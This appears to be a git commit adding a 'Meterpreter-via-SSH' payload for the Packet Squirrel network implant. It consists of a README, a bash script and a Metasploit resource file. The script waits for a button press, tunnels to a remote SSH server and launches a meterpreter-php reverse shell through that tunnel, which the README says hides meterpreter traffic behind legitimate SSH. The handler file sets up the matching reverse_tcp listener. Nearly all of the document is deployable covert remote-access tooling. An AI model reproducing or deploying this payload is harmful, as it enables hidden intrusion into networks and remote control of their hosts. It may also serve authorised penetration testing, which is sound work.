added Meterpreter-via-SSH payload (#27)

pull/28/head
Zappus 2017-12-26 23:53:25 -05:00 committed by Sebastian Kinne
parent 06479075e0
commit 261fb62b10
3 changed files with 133 additions and 0 deletions

View File

@ -0,0 +1,50 @@
# Meterpreter-via-SSH
## Overview
This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel.
The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity.
## Operational Design Considerations
* Payload remains silent on the network until user presses the button.
* Payload stops the SSH connection if meterpreter shell fails.
* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times).
## Getting Started
Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options:
* SSH_USER - username on remote SSH server
* SSH_HOST - ip/domain of remote SSH server
In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well.
* MSF_PORT - port of meterpreter listener
### Generate SSH Key on Squirrel
You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel:
```
root@squirrel:~# ssh-keygen
```
### Allow Squirrel on SSH Server
Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file:
```
user@server:~# mkdir ~/.ssh
user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
```
### Run Metasploit with Resource
```
msf@server:~# msfconsole -r server.rc
```
## LED Definitions
1. Configure NETMODE
* Solid Magenta
2. Connect to SSH Server
* SUCCESS - Blink Amber 5 Times
* FAIL - Blink Red 2 Times
3. Launch meterpreter
* SUCCESS - Blink Cyan 1 Time
* FAIL - Blink Red 1 Time
## Hardening Recommendations
1. Use an account with limited privileges for SSH access on the server.
2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
3. Disable PasswordAuthentication in sshd_config on the server.

View File

@ -0,0 +1,74 @@
#!/bin/bash
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus
# Version: 1.0
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - Configuring NETMODE
# LED OFF - Waiting for BUTTON
# Red Blink 2 Times - SSH Connection Failed
# Amber Blink 5 Times - SSH Connection Successful
# Red Blink 1 Time - Meterpreter Failed
# Cyan Blink 1 Time - Meterpreter Successful
SSH_USER="username"
SSH_HOST="hostname"
MSF_PORT=31337
function start()
{
LED SETUP
NETMODE NAT
sleep 5
LED OFF
# Wait until BUTTON is pressed
while true
do
NO_LED=1 BUTTON && {
# close any existing meterpreter and SSH connections
kill `pgrep php` 2> /dev/null
kill `pgrep -x ssh` 2> /dev/null
sleep 2
# Establish connection to remote SSH server
ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
# Check if SSH connection worked
if [ -z `pgrep -x ssh` ]
then
LED FAIL
sleep 5
LED OFF
continue
else
LED STAGE1
sleep 5
fi
# Start meterpreter reverse shell
meterpreter-php 127.0.0.1 $MSF_PORT &
sleep 2
# Check if meterpreter shell started
if [ -z `pgrep php` ]
then
# Close SSH connection because meterpreter failed
kill `pgrep -x ssh` 2> /dev/null
LED FAIL
else
LED SPECIAL
fi
sleep 1
LED OFF
}
done
}
# Start the payload
start &

View File

@ -0,0 +1,9 @@
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set EnableContextEncoding false
set DisablePayloadHandler false
set ExitOnSession false
set ListenerTimeout 0
set LHOST 127.0.0.1
set LPORT 31337
run -j